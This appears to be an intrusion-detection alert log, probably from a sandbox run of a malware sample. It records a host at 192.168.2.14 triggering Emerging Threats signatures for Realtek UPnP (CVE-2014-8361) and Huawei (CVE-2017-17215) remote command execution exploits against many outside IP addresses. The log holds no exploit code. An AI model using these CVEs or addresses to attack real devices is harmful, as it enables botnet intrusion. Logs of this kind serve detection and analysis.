                                                07/20/24-23:06:14.162873TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25818852869192.168.2.1464.26.80.76
                                                07/20/24-23:05:34.652423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751037215192.168.2.1434.202.46.128
                                                07/20/24-23:06:01.613195TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613673452869192.168.2.1468.182.243.39
                                                07/20/24-23:06:33.320646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3482252869192.168.2.14155.48.187.37
                                                07/20/24-23:05:56.696605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5920652869192.168.2.14106.31.240.76
                                                07/20/24-23:07:23.347168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615568452869192.168.2.1460.97.101.84
                                                07/20/24-23:05:45.563600TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413452869192.168.2.14141.254.197.56
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724437215192.168.2.14157.153.199.206
                                                07/20/24-23:05:40.471609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3713652869192.168.2.1498.239.232.196
                                                07/20/24-23:05:58.803048TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25702052869192.168.2.14192.95.119.34
                                                07/20/24-23:05:45.468009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029037215192.168.2.14113.180.21.101
                                                07/20/24-23:05:48.767395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443637215192.168.2.14197.173.33.138
                                                07/20/24-23:05:38.944157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906437215192.168.2.1441.52.38.231
                                                07/20/24-23:05:52.537891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5917052869192.168.2.14222.40.126.158
                                                07/20/24-23:05:40.413313TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5212852869192.168.2.14117.40.50.228
                                                07/20/24-23:05:35.504398TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027052869192.168.2.14129.37.83.27
                                                07/20/24-23:05:36.265249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6027252869192.168.2.14106.240.191.91
                                                07/20/24-23:05:37.560327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24520652869192.168.2.14103.14.70.39
                                                07/20/24-23:05:56.243447TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613885252869192.168.2.14159.241.80.83
                                                07/20/24-23:05:56.424977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847437215192.168.2.14202.58.65.35
                                                07/20/24-23:07:07.879176TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5320252869192.168.2.1413.115.234.149
                                                07/20/24-23:05:39.625456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6058252869192.168.2.1497.6.189.98
                                                07/20/24-23:05:56.159948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131237215192.168.2.14189.18.49.177
                                                07/20/24-23:05:56.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679037215192.168.2.14157.221.102.153
                                                07/20/24-23:05:38.482733TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614890052869192.168.2.14206.167.163.90
                                                07/20/24-23:05:38.522009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4985252869192.168.2.1467.38.12.24
                                                07/20/24-23:05:57.592012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3467652869192.168.2.14152.209.55.30
                                                07/20/24-23:05:58.384426TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25988652869192.168.2.14213.166.217.247
                                                07/20/24-23:06:11.487097TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5407052869192.168.2.14167.174.248.212
                                                07/20/24-23:06:04.437943TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615357852869192.168.2.14101.111.118.23
                                                07/20/24-23:06:35.414252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615363052869192.168.2.14186.187.42.215
                                                07/20/24-23:06:18.458631TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613387852869192.168.2.1496.23.20.79
                                                07/20/24-23:06:01.181584TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25872052869192.168.2.14160.54.17.66
                                                07/20/24-23:05:35.598269TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614027052869192.168.2.1427.21.93.45
                                                07/20/24-23:06:06.375612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4543252869192.168.2.14142.157.239.245
                                                07/20/24-23:05:36.323648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259237215192.168.2.14157.227.154.63
                                                07/20/24-23:05:48.041200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4350452869192.168.2.1439.123.223.174
                                                07/20/24-23:06:19.633139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614516252869192.168.2.14122.109.165.81
                                                07/20/24-23:05:40.246053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6083652869192.168.2.1453.151.134.25
                                                07/20/24-23:05:48.223799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615236052869192.168.2.14115.216.218.252
                                                07/20/24-23:05:44.290090TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23382652869192.168.2.1458.92.201.189
                                                07/20/24-23:05:48.756259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725837215192.168.2.14176.233.196.39
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531037215192.168.2.14175.161.137.109
                                                07/20/24-23:05:45.019762TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615222052869192.168.2.14223.70.59.173
                                                07/20/24-23:05:57.224112TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615984052869192.168.2.1450.236.40.162
                                                07/20/24-23:05:44.246846TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3634452869192.168.2.14204.197.104.210
                                                07/20/24-23:05:39.035942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749237215192.168.2.1441.214.2.194
                                                07/20/24-23:05:46.088778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508637215192.168.2.14197.24.233.5
                                                07/20/24-23:05:39.672304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076237215192.168.2.1441.17.116.139
                                                07/20/24-23:05:47.965423TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614491052869192.168.2.14223.10.185.52
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208437215192.168.2.14197.36.42.86
                                                07/20/24-23:05:50.557201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5208837215192.168.2.14197.22.67.97
                                                07/20/24-23:05:58.383835TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615494852869192.168.2.14163.106.60.149
                                                07/20/24-23:06:04.575032TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25522852869192.168.2.14124.220.109.211
                                                07/20/24-23:05:57.526744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4892652869192.168.2.14140.124.136.34
                                                07/20/24-23:05:57.939285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174852869192.168.2.1447.119.95.118
                                                07/20/24-23:05:37.489810TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24709252869192.168.2.14173.175.30.8
                                                07/20/24-23:05:47.101729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566837215192.168.2.14157.115.117.80
                                                07/20/24-23:05:50.515904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567437215192.168.2.14197.24.192.82
                                                07/20/24-23:05:57.214918TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3296852869192.168.2.14204.159.132.238
                                                07/20/24-23:05:58.696476TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5888452869192.168.2.1447.0.16.112
                                                07/20/24-23:05:42.245742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889437215192.168.2.14157.194.169.49
                                                07/20/24-23:06:04.458817TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23333852869192.168.2.1457.243.186.230
                                                07/20/24-23:05:36.325662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373837215192.168.2.1441.254.167.35
                                                07/20/24-23:06:01.319175TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6031052869192.168.2.14155.136.119.1
                                                07/20/24-23:05:59.315621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25620652869192.168.2.14123.181.87.233
                                                07/20/24-23:05:56.402930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513237215192.168.2.14197.128.209.25
                                                07/20/24-23:05:36.338927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913037215192.168.2.1441.97.149.25
                                                07/20/24-23:05:37.453622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3629652869192.168.2.1431.136.109.228
                                                07/20/24-23:06:29.727366TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5037052869192.168.2.1487.9.39.34
                                                07/20/24-23:05:46.767175TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614808652869192.168.2.14131.101.133.159
                                                07/20/24-23:05:48.059855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4363852869192.168.2.14161.199.46.212
                                                07/20/24-23:06:04.290199TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614928452869192.168.2.1496.91.77.99
                                                07/20/24-23:05:59.727506TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615834652869192.168.2.14147.97.158.170
                                                07/20/24-23:05:59.042861TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25517452869192.168.2.14146.28.213.74
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703837215192.168.2.1441.130.22.42
                                                07/20/24-23:05:52.493809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24437852869192.168.2.14202.54.99.106
                                                07/20/24-23:06:11.420819TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23312852869192.168.2.14152.108.253.32
                                                07/20/24-23:06:33.181510TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5873852869192.168.2.14205.84.230.6
                                                07/20/24-23:06:02.297270TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5270852869192.168.2.14211.144.169.11
                                                07/20/24-23:06:02.902217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4718852869192.168.2.14120.192.98.227
                                                07/20/24-23:06:05.799314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23920652869192.168.2.14221.83.247.226
                                                07/20/24-23:05:35.358336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5023852869192.168.2.1414.214.68.156
                                                07/20/24-23:05:37.442841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4144052869192.168.2.1481.143.140.223
                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4670637215192.168.2.14157.198.129.124
                                                07/20/24-23:05:57.559320TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615311452869192.168.2.14133.109.89.140
                                                07/20/24-23:05:40.413672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5505652869192.168.2.1434.179.222.192
                                                07/20/24-23:05:40.413672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25505652869192.168.2.1434.179.222.192
                                                07/20/24-23:05:48.801547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061237215192.168.2.14157.238.185.255
                                                07/20/24-23:06:01.183172TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24786652869192.168.2.14100.130.98.116
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310437215192.168.2.14197.92.162.105
                                                07/20/24-23:06:04.995860TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614388852869192.168.2.14170.158.29.228
                                                07/20/24-23:06:01.961036TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614088052869192.168.2.1496.35.224.207
                                                07/20/24-23:05:39.741053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3527052869192.168.2.1450.231.248.171
                                                07/20/24-23:05:59.257734TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5380052869192.168.2.1498.243.190.82
                                                07/20/24-23:05:37.465013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25585452869192.168.2.14175.80.113.227
                                                07/20/24-23:06:08.528851TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25267252869192.168.2.14204.213.243.95
                                                07/20/24-23:06:10.964001TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613556452869192.168.2.14150.203.239.55
                                                07/20/24-23:05:39.677505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3449837215192.168.2.1441.25.92.21
                                                07/20/24-23:05:39.839035TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613700252869192.168.2.1439.47.233.5
                                                07/20/24-23:05:47.347764TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614078652869192.168.2.14134.147.18.133
                                                07/20/24-23:06:01.556801TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23588052869192.168.2.14148.117.182.60
                                                07/20/24-23:05:52.633204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5639052869192.168.2.14171.64.212.60
                                                07/20/24-23:06:10.010711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4818852869192.168.2.14165.128.217.108
                                                07/20/24-23:05:58.382027TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5059852869192.168.2.14204.242.118.241
                                                07/20/24-23:05:59.136809TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614706052869192.168.2.14181.39.217.252
                                                07/20/24-23:05:37.496382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3988852869192.168.2.148.166.54.209
                                                07/20/24-23:05:52.442221TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24841452869192.168.2.1431.172.196.201
                                                07/20/24-23:06:55.587260TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614386452869192.168.2.1459.45.228.144
                                                07/20/24-23:05:36.327719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083237215192.168.2.14197.182.192.84
                                                07/20/24-23:05:37.442841TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24144052869192.168.2.1481.143.140.223
                                                07/20/24-23:05:57.533213TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614175852869192.168.2.14133.93.209.42
                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3288437215192.168.2.14197.236.154.168
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099037215192.168.2.1413.17.85.4
                                                07/20/24-23:05:37.442841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4905052869192.168.2.1413.122.59.167
                                                07/20/24-23:05:58.378138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5596652869192.168.2.1485.33.92.254
                                                07/20/24-23:05:36.325898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029237215192.168.2.14197.131.149.155
                                                07/20/24-23:06:12.244446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23433052869192.168.2.14134.6.131.96
                                                07/20/24-23:06:32.390708TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6075252869192.168.2.14121.110.33.111
                                                07/20/24-23:06:11.320570TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613334452869192.168.2.1450.132.36.140
                                                07/20/24-23:05:35.712014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615416452869192.168.2.14113.211.98.23
                                                07/20/24-23:05:57.702462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6048252869192.168.2.14102.108.27.28
                                                07/20/24-23:05:45.265292TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614723852869192.168.2.14161.61.246.176
                                                07/20/24-23:05:36.324297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579837215192.168.2.1441.83.49.148
                                                07/20/24-23:05:35.819768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5937452869192.168.2.14106.140.193.219
                                                07/20/24-23:06:01.824928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3386452869192.168.2.1475.226.205.63
                                                07/20/24-23:06:32.673677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5156852869192.168.2.14217.175.14.4
                                                07/20/24-23:05:58.962395TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23787252869192.168.2.1462.106.120.156
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898437215192.168.2.14197.232.120.82
                                                07/20/24-23:05:58.195412TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614779052869192.168.2.1434.148.232.132
                                                07/20/24-23:05:50.522256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677437215192.168.2.1441.87.90.169
                                                07/20/24-23:06:07.980733TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3280052869192.168.2.1481.215.136.101
                                                07/20/24-23:06:34.929510TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479052869192.168.2.14223.138.154.84
                                                07/20/24-23:05:59.058741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6049452869192.168.2.1478.187.239.16
                                                07/20/24-23:06:09.610819TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614379052869192.168.2.14137.55.138.211
                                                07/20/24-23:05:57.590266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5641652869192.168.2.1465.123.169.88
                                                07/20/24-23:05:59.433517TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24897252869192.168.2.14152.185.122.165
                                                07/20/24-23:06:06.375612TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24543252869192.168.2.14142.157.239.245
                                                07/20/24-23:05:52.594252TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24993252869192.168.2.1471.131.126.141
                                                07/20/24-23:05:56.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270437215192.168.2.1414.57.157.85
                                                07/20/24-23:05:58.195412TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3680852869192.168.2.14179.55.29.89
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504237215192.168.2.14197.115.224.42
                                                07/20/24-23:07:32.121311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23390252869192.168.2.14212.164.237.193
                                                07/20/24-23:06:08.476019TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613458252869192.168.2.14111.86.168.149
                                                07/20/24-23:06:01.121675TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23850652869192.168.2.14199.208.79.51
                                                07/20/24-23:05:50.522257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874837215192.168.2.14157.42.248.251
                                                07/20/24-23:06:24.686159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615066852869192.168.2.14132.80.204.166
                                                07/20/24-23:06:05.799314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3920652869192.168.2.14221.83.247.226
                                                07/20/24-23:06:16.692772TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5841852869192.168.2.1494.75.131.134
                                                07/20/24-23:06:00.971446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3918252869192.168.2.14171.66.243.60
                                                07/20/24-23:06:08.410817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5707452869192.168.2.14206.252.90.242
                                                07/20/24-23:05:37.453622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5658652869192.168.2.14114.225.14.65
                                                07/20/24-23:05:59.454601TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709252869192.168.2.1448.95.62.86
                                                07/20/24-23:05:58.006516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613502052869192.168.2.14155.70.176.109
                                                07/20/24-23:06:00.177523TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25902652869192.168.2.14101.76.199.86
                                                07/20/24-23:05:52.486069TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25095652869192.168.2.14219.121.248.52
                                                07/20/24-23:06:01.878715TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23831452869192.168.2.1412.80.117.177
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924437215192.168.2.1441.42.206.73
                                                07/20/24-23:06:50.384864TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614473852869192.168.2.1419.139.70.112
                                                07/20/24-23:05:56.086217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992837215192.168.2.14157.41.4.23
                                                07/20/24-23:06:01.183172TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4786652869192.168.2.14100.130.98.116
                                                07/20/24-23:06:10.391415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5160452869192.168.2.1413.31.100.161
                                                07/20/24-23:06:45.946586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5067452869192.168.2.1412.142.133.82
                                                07/20/24-23:05:59.840145TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615304252869192.168.2.1423.110.47.132
                                                07/20/24-23:06:11.280682TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615696852869192.168.2.14203.255.46.180
                                                07/20/24-23:06:19.059438TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24533452869192.168.2.14122.109.165.81
                                                07/20/24-23:05:52.503773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23917852869192.168.2.14202.78.132.130
                                                07/20/24-23:05:38.949221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920037215192.168.2.1441.182.111.237
                                                07/20/24-23:06:01.978394TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26066452869192.168.2.14173.164.101.22
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009237215192.168.2.14157.244.153.74
                                                07/20/24-23:06:03.672694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4476452869192.168.2.14193.17.40.179
                                                07/20/24-23:05:36.327720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5001637215192.168.2.14176.127.129.109
                                                07/20/24-23:05:56.086216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211437215192.168.2.14197.115.183.115
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207237215192.168.2.14197.118.74.140
                                                07/20/24-23:05:57.523834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5101652869192.168.2.1417.97.170.109
                                                07/20/24-23:05:59.377287TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24475852869192.168.2.1483.147.48.75
                                                07/20/24-23:05:56.907864TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615875852869192.168.2.14179.61.198.141
                                                07/20/24-23:05:48.767395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598037215192.168.2.14157.38.140.115
